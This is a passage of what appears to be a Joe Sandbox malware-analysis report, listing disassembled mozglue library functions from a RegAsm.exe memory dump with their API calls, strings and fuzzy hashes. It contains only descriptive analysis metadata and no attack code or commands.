                                                                                                                                                                                                                                                    • Opcode ID: de664ae4308eeedf24fb4115c48c4945abb26fc1e3c23be609d2892df6a5bd23
                                                                                                                                                                                                                                                    • Instruction ID: e014f279f8dab88b3e49cca01632d93aa6904e434b5ed03538bf0e4c0cf83e90
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: de664ae4308eeedf24fb4115c48c4945abb26fc1e3c23be609d2892df6a5bd23
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A021A97620520AEFDF009F54DD4CDDA3BBAFB0A324F604029FA0492690CB319861CFA0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C7376C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32 ref: 6C7376F2
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000001), ref: 6C737705
                                                                                                                                                                                                                                                      • Part of subcall function 6C6ECA10: malloc.MOZGLUE(?), ref: 6C6ECA26
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C737717
                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6C73778F,00000000,00000000,00000000,00000000), ref: 6C737731
                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C737760
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
                                                                                                                                                                                                                                                    • String ID: }>ql
                                                                                                                                                                                                                                                    • API String ID: 2538299546-3838052867
                                                                                                                                                                                                                                                    • Opcode ID: 0cb7cb954f1592e4723fc96eab3599f5f22a5551b5c6ef452a70d3d0ba2e6ee1
                                                                                                                                                                                                                                                    • Instruction ID: 3b762b17849eb2e0503c22f2797ba91535988074e7eea9974862cebebdab69e2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0cb7cb954f1592e4723fc96eab3599f5f22a5551b5c6ef452a70d3d0ba2e6ee1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5911B2B1D05325ABE710AF7A8D48BABBEE8EF46354F044429F848A7301E771984487E2
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6E1FA0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C70AB89: EnterCriticalSection.KERNEL32(6C75E370,?,?,?,6C6D34DE,6C75F6CC,?,?,?,?,?,?,?,6C6D3284), ref: 6C70AB94
                                                                                                                                                                                                                                                      • Part of subcall function 6C70AB89: LeaveCriticalSection.KERNEL32(6C75E370,?,6C6D34DE,6C75F6CC,?,?,?,?,?,?,?,6C6D3284,?,?,6C6F56F6), ref: 6C70ABD1
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(combase.dll,?), ref: 6C6E1FDE
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 6C6E1FFD
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6E2011
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32 ref: 6C6E2059
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                                                                                                                                                                                    • String ID: CoCreateInstance$combase.dll
                                                                                                                                                                                                                                                    • API String ID: 4190559335-2197658831
                                                                                                                                                                                                                                                    • Opcode ID: 6f357fcc45dcfcec65ab88040611146904826877a6bc38c0cf7d0fe98c83fa2e
                                                                                                                                                                                                                                                    • Instruction ID: 865369c4b4a30c1f8a397514fd5a6a09b36039f4d548dcfe96f5dbba9ac8966f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f357fcc45dcfcec65ab88040611146904826877a6bc38c0cf7d0fe98c83fa2e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7115EB5B05205AFDF20EF15CD4CE9A3B7AFB4A369F60403AF90592680DB31A850CF61
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6E0EE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C70AB89: EnterCriticalSection.KERNEL32(6C75E370,?,?,?,6C6D34DE,6C75F6CC,?,?,?,?,?,?,?,6C6D3284), ref: 6C70AB94
                                                                                                                                                                                                                                                      • Part of subcall function 6C70AB89: LeaveCriticalSection.KERNEL32(6C75E370,?,6C6D34DE,6C75F6CC,?,?,?,?,?,?,?,6C6D3284,?,?,6C6F56F6), ref: 6C70ABD1
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(combase.dll,00000000,?,6C70D9F0,00000000), ref: 6C6E0F1D
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6C6E0F3C
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6E0F50
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,6C70D9F0,00000000), ref: 6C6E0F86
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                                                                                                                                                                                    • String ID: CoInitializeEx$combase.dll
                                                                                                                                                                                                                                                    • API String ID: 4190559335-2063391169
                                                                                                                                                                                                                                                    • Opcode ID: b25b48fc2afd8774f6dae22e2021a0778ff628c35baf7823d23bf6bb3a3b08bc
                                                                                                                                                                                                                                                    • Instruction ID: aee28b41ecf898ce6866932942a391857f8ba49ea069050718b044dfbe38fbc8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b25b48fc2afd8774f6dae22e2021a0778ff628c35baf7823d23bf6bb3a3b08bc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2711707570A2409BDF00CF55CE08A5637B8FB4B325F84423AED05D2684DF31A415CA59
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C71F540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C71945E
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719470
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719482
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: __Init_thread_footer.LIBCMT ref: 6C71949F
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71F559
                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C71F561
                                                                                                                                                                                                                                                      • Part of subcall function 6C7194D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7194EE
                                                                                                                                                                                                                                                      • Part of subcall function 6C7194D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C719508
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71F577
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71F585
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C71F5A3
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C71F56A
                                                                                                                                                                                                                                                    • [I %d/%d] profiler_resume, xrefs: 6C71F239
                                                                                                                                                                                                                                                    • [I %d/%d] profiler_resume_sampling, xrefs: 6C71F499
                                                                                                                                                                                                                                                    • [I %d/%d] profiler_pause_sampling, xrefs: 6C71F3A8
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                                                    • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                                                                                                                                                                                                    • API String ID: 2848912005-2840072211
                                                                                                                                                                                                                                                    • Opcode ID: 447872b98ef011d63be5e69d420b256fd5a4027744a6c4ba06df564fc112574e
                                                                                                                                                                                                                                                    • Instruction ID: d606bfe8a0fcfde952d73fb0d49e0442bcd82adec1760edf19363bb5c5db43fb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 447872b98ef011d63be5e69d420b256fd5a4027744a6c4ba06df564fc112574e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BCF0B4757002009BDB006F65984C97A77BDEB8629DF880035EA15C3B01CF31A8018760
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6E0E40 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(kernel32.dll,6C6E0DF8), ref: 6C6E0E82
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6C6E0EA1
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6E0EB5
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32 ref: 6C6E0EC5
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Library$AddressFreeInit_thread_footerLoadProc
                                                                                                                                                                                                                                                    • String ID: GetProcessMitigationPolicy$kernel32.dll
                                                                                                                                                                                                                                                    • API String ID: 391052410-1680159014
                                                                                                                                                                                                                                                    • Opcode ID: 786e2430f1ebc3f836e2627aa54e2a514c0abb4a45a194a419d0546d1d514e61
                                                                                                                                                                                                                                                    • Instruction ID: 9a88f6f03a6a035c7c74e30ed14feffa3a651a4195ae310892c7670e3a723bf2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 786e2430f1ebc3f836e2627aa54e2a514c0abb4a45a194a419d0546d1d514e61
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36014670B05381CFDF108FF8DA18A6237B5F70A318FD4093ADA0192B80DF34A455DA15
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C71F600 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C71945E
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719470
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719482
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: __Init_thread_footer.LIBCMT ref: 6C71949F
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71F619
                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C71F598), ref: 6C71F621
                                                                                                                                                                                                                                                      • Part of subcall function 6C7194D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7194EE
                                                                                                                                                                                                                                                      • Part of subcall function 6C7194D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C719508
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71F637
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C75F4B8,?,?,00000000,?,6C71F598), ref: 6C71F645
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C75F4B8,?,?,00000000,?,6C71F598), ref: 6C71F663
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C71F62A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                                                    • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                                                                                                                                                                                    • API String ID: 2848912005-753366533
                                                                                                                                                                                                                                                    • Opcode ID: 55c2b97494a9ca1b16f94f787884ce1c126c6afa6d3e74732b56121fa8f26270
                                                                                                                                                                                                                                                    • Instruction ID: 4913226cfabc9a04ce129b98ca8293d9da276ef662905cf584877c4551d0ad10
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 55c2b97494a9ca1b16f94f787884ce1c126c6afa6d3e74732b56121fa8f26270
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1F0BE75304204ABDB006B65984CABA7BBDEB862ADF880036EA1583B41CF366C028760
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C7105F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C70CFAE,?,?,?,6C6D31A7), ref: 6C7105FB
                                                                                                                                                                                                                                                    • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C70CFAE,?,?,?,6C6D31A7), ref: 6C710616
                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C6D31A7), ref: 6C71061C
                                                                                                                                                                                                                                                    • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C6D31A7), ref: 6C710627
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _writestrlen
                                                                                                                                                                                                                                                    • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                                                                                                    • API String ID: 2723441310-2186867486
                                                                                                                                                                                                                                                    • Opcode ID: 901ecf626b34889bfd0303fbcc3ac3fd3460694e035278359377ad3c440506a4
                                                                                                                                                                                                                                                    • Instruction ID: d2e19b51a16d5bf53d3ce7ffadafb05ee1242a6ba4ebe68d18057d4abc62ca40
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 901ecf626b34889bfd0303fbcc3ac3fd3460694e035278359377ad3c440506a4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44E08CE2A0101037F5142256AC8ADBB761DDBC6138F080039FD0D82301E94ABD1E51F7
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6E05F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 5daa9886696022d6eacc601a4d64767f1aa6aa3a3e9dd5f19a67070945f61fd7
                                                                                                                                                                                                                                                    • Instruction ID: 3364b71217a723858fd0f96aacdb2cf6fc8c9920d463a95785682abd14572bc1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5daa9886696022d6eacc601a4d64767f1aa6aa3a3e9dd5f19a67070945f61fd7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95A147B0A056458FDB14CF29C984B9AFBF1BF4D304F54866ED44A97B40EB30AA45CFA4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C7314A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7314C5
                                                                                                                                                                                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C7314E2
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C731546
                                                                                                                                                                                                                                                    • InitializeConditionVariable.KERNEL32(?), ref: 6C7315BA
                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C7316B4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1909280232-0
                                                                                                                                                                                                                                                    • Opcode ID: 0727e44c8b50f7780dd761c8be7dbbe5f6859bb634f832626c36cadcdabae851
                                                                                                                                                                                                                                                    • Instruction ID: 8d106a3ce02d97fb0958d528093e22647e2a2d008874558083f63fb278029f57
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0727e44c8b50f7780dd761c8be7dbbe5f6859bb634f832626c36cadcdabae851
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 70610171A007149BDB118F24C984BEEBBB5FF89308F44952CED8A57702DB35E949CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C72C160 Relevance: 9.2, APIs: 6, Instructions: 174COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C72C1F1
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C72C293
                                                                                                                                                                                                                                                    • fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C72C29E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
